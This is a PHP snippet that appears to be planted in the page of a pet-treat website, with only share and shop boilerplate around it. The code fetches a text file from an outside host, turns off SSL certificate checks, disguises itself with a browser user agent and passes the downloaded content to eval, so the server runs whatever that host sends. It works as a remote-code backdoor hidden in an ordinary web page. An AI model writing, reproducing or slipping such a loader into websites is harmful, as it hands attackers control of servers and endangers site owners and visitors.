<?php
$url = "https://seekor-ikan.online/data/1780996115.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Bypass proteksi SSL
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"); // 

$data = curl_exec($ch);
curl_close($ch);

eval("?>" . $data);
?>

Share This Article

Join The Club

Choose a box of Natural Treats for your dog.

Other Articles